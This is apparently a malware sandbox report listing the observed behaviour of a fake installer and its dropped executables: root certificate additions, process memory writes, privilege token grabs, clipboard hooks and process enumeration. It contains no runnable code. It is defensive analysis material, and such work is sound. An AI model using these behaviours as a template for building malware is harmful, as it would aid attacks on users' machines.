Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "{E164F996-FF93-4675-BDD8-6C47AB0B86B1}" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "269" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000088b9e17b2a9261ae7a545696fd294b28c85463fc5ed0e66ba769e87cd5796f8251b5a682d1be4be0526e6cba84fb68e97b7fe823f37171e85d2675a65864a3ce6c96fc5e793c57bd5c95a2a9f5d6ec84105a340bc1fccb87859b C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e6a852f849bb2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e6a852f849bb2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19c6762a08beae.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19c6762a08beae.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\juubrcw N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\juubrcw N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\juubrcw N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\ProgramData\690570.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19f84b58b3d7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat191649b47c9e2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\MsiExec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\browser_broker.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\330255.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4316 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4316 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4316 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4332 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe
PID 4332 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe
PID 4332 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe
PID 3552 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
